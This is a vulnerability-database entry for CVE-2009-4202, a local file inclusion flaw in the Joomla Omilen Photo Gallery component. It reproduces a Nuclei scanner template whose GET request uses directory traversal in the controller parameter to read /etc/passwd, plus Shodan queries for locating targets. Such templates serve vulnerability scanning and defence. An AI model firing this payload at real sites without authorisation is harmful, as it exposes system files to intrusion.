Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2009-4202
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
7
cve
joomla
local file inclusion
photo gallery
exploit database

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.029

Percentile

90.8%

Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.

id: CVE-2009-4202

info:
  name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/8870
    - http://www.vupen.com/english/advisories/2009/1494
    - https://nvd.nist.gov/vuln/detail/CVE-2009-4202
    - http://www.exploit-db.com/exploits/8870
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2009-4202
    cwe-id: CWE-22
    epss-score: 0.01917
    epss-percentile: 0.88567
    cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla\!
    shodan-query:
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve,cve2009,joomla,lfi,photo,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022044fc59647921ae246b7de0555de2a1c11877a783041099b578b92e397a07c79d022021f6a35647edd8212110c1017e4960dd601614859682c69173f2c6dcca9173ff:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.029

Percentile

90.8%

Related for NUCLEI:CVE-2009-4202